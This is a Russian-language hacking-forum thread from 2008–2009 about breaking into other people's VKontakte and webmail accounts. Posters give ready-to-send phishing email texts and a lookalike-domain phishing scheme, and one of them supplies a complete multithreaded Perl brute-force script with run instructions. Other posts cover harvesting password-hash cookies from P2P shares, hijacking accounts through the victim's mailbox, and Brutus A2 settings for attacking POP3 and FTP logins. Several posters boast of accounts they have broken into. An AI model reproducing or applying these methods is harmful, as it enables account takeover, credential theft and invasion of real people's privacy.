Форум SoftWeb.ru

Форум SoftWeb.ru (https://softweb.ru/index.php)
-   Взлом (https://softweb.ru/forumdisplay.php?f=248)
-   -   Как сломать ВКонтактет.ру (движок facebook) ??? (https://softweb.ru/showthread.php?t=30651)

charmed 31.10.2008 00:28

Как сломать ВКонтактет.ру (движок facebook) ???
 
Подскажите люди добрые где можно скачать такую прогу как facebook_hack
Пол интернета перерыла нигде ни нашла :(

4айник 31.10.2008 03:11

Re: Как сломать Контакт (движок facebook) ???
 
charmed, есть мнение, что существование такой программы - фейк (типа первоапрельской шутки)

Лучше прочти [Ссылки могут видеть только зарегистрированные пользователи. ] тему. немного еще в [Ссылки могут видеть только зарегистрированные пользователи. ] теме есть, поскольку приемы взлома очень схожи. А вообще некоторые товарищи в качестве паролей выбирают свои телефоны, клички собак и т.д.

Владимир_ 06.03.2009 00:42

ВКонтакте.ру
 
Цитата:

Сообщение от Электрошокер3000 (Сообщение 400572)
Уважаемые ! А как мне можно взломать свой (ну и если понадобится чужой) пароль сайта "В Контакте" ???:787:

Некоторые способы взлома:

1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "[Ссылки могут видеть только зарегистрированные пользователи. ]", "[Ссылки могут видеть только зарегистрированные пользователи. ]", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:

EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: [Ссылки могут видеть только зарегистрированные пользователи. ]
PA: 123456

Чтоб не было путаницы, в теме письма укажите тему "Обновление".

Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. [Ссылки могут видеть только зарегистрированные пользователи. ] [4.27 Kb]
[Ссылки могут видеть только зарегистрированные пользователи. ]
3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "[Ссылки могут видеть только зарегистрированные пользователи. ]", "[Ссылки могут видеть только зарегистрированные пользователи. ]", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.

Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.

Код:

Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):



#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}


--------------------------------------------------------------------------------



Цитата:

--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------

Как запустить скрипт:

Цитата:

--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

[Ссылки могут видеть только зарегистрированные пользователи. ]



5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте сниффер.
Источник: webxakep.net))•

6) Открываем в p2p любой популярный российский хаб, пишем в поиске “vkontakte”
и вуаля! получаем файлы с куками самых нерасторопных юзеров. И всё это было бы не так смешно,
если бы доблестные программисты вконтакте не догадались хранить в куках логин и пароль юзера.
Открываем файлик с куками:
remixemail - логин, где %40 это собачка
remixpass - md5 хэш пароля
Потом гуглим минуты две и находим сервис по расшифровке md5,
скармливаем ему хэш пароля, в 90% случаев получаем пароль!
Качаешь любую р2р прогу. Самые знаменитые - это (StrongDC++ имеется на этом форуме) и ApexDC++, а так их очень много. Далее идешь сюда - [Ссылки могут видеть только зарегистрированные пользователи. ] Выбираешь хаб любой который понравится и заходишь туда. Далее заходишь файл-настройки-шара, расшариваешь кое-что (гигов на 5-10 как минимум), так как на многих хабах запрещен поиск с маленькой шарой. Ну а дальше нажимаешь на поиск и ищешь что тебе надо.
Источник:forum.hackersoft.ru

Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте

С наилучшими пожеланиями))•

GIPER 06.03.2009 10:10

Re: Как сломать Контакт (движок facebook) ???
 
Прога BrutusA2 (это НЕ та прога, которая указана выше) . Я уже 4 вконтактера взломала.

4айник 06.03.2009 12:13

Re: Как сломать Контакт (движок facebook) ???
 
GIPER,
ты-же не далее как месяц назад хаяля ее:
Цитата:

Сообщение от GIPER (Сообщение 387706)
Скачала прогу BrutusA2 - нифига не рулит!

:)

а вообще она у нас лежит [Ссылки могут видеть только зарегистрированные пользователи. ] и [Ссылки могут видеть только зарегистрированные пользователи. ]

ЗЫ
брутов на свете много, часть из них лежит в темах, указанных мною во 2м сообщении.
но к брутам еще и голову неплохо бы прикладывать

GIPER 07.03.2009 17:14

Re: Как сломать Контакт (движок facebook) ???
 
Цитата:

Сообщение от 4айник (Сообщение 400888)
GIPER,
ты-же не далее как месяц назад хаяля ее:
Цитата:GIPER
Скачала прогу BrutusA2 - нифига не рулит!


Я уже разобралась.

Владимир_ 30.03.2009 14:14

Re: Как сломать Контакт (движок facebook) ???
 
Вот такой момент про соц.сеть ВКонтакте. При регистрации нужно указать почтовый ящик , так вот если зайти на него то и контакт взламывать не надо. На странице авторизации Контакта в Login: впишем ящичек (который использовали при регистрации) и жмем кнопку "забыл пароль" как он тутже приходит на почту. Копируем, удаляем и пасс у нас...
Узнать мыло Контакто можно так:
Цитата:

Сообщение от Dont_Work
Просто открываеш свой агент,смотриш анкету"в контакте"открываеш (поиск людей)в агенте:водиш имя фамилию жертвы нажимаеш"поиск"Тебе находит человека нажимаеш или "мой мир" или "анкетка" и там написан меил твоей жертвы.

Соответственно по разным ящикам можно искать.

XenYs 11.04.2009 19:02

Re: Как сломать Контакт (движок facebook) ???
 
Цитата:

Сообщение от GIPER (Сообщение 401312)
Я уже разобралась в проге, и к тому же 4-ёх Вконтактеров взломала!

а можешь объяснить поподробней как это сделать????ато я пробовал взломать мыльники на mail.ru,но у меня нечерта не получилось....

Владимир_ 11.04.2009 20:58

Re: Как сломать Контакт (движок facebook) ???
 
Цитата:

Сообщение от XenYs (Сообщение 415042)
а можешь объяснить поподробней как это сделать?

[Ссылки могут видеть только зарегистрированные пользователи. ]

GIPER 11.04.2009 21:33

Re: Как сломать Контакт (движок facebook) ???
 
Цитата:

Сообщение от XenYs (Сообщение 415042)
а можешь объяснить поподробней как это сделать????ато я пробовал взломать мыльники на mail.ru,но у меня нечерта не получилось....

Как взломать МЫЛЬЯ:
В строке Type выбераешь POP3(поп 3 используется почти для любого мыла). Затем в строке Target надо POP3. Например у ящика [Ссылки могут видеть только зарегистрированные пользователи. ] POP3 будет pop.rambler.ru у ящика [Ссылки могут видеть только зарегистрированные пользователи. ] -pop.yandex.ru и т.д.(данные ссылки не настоящие:no2: )Принцип такой же. В строке Authentication Options ставишь галочку в Single User не убирая при этом галку с Use Username и указываешь ID юзера жмём Start и ждёшь положительного результата . Вроде усё.
ЗЫ: Извените , что отклоняюсь от темы...
ЗЗЫ:А вот вам и по теме:
Как взломать КОНТАКТ пошагово :
Если уже скачал BrutusA2, в строке "Targel" набираем "ftp.vkontakte.ru" .В строке "Type" выбираем " FTP". В опции "Authentication Options" ставим галочку на "Single User" тоже НЕ убирая при этом галочку с "Use Usename".В строке "User File" указываем ID юзера, которого надо хакнуть. С инета качаем словарик с паролями до от 2000 до 8000 симболов. Чем больше словарик, тем дольше будет брут искать пароль. Сохраняем словарик в ту же папку , где у вас нахадится брут.Далее в строке "Pass File" выбираем этот словарик.Далее те потребунтся только набраться побольше терпения и нажать на старт .gamer1::89:


Часовой пояс GMT +3, время: 09:37.

Работает на vBulletin® версия 3.8.12 by vBS.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot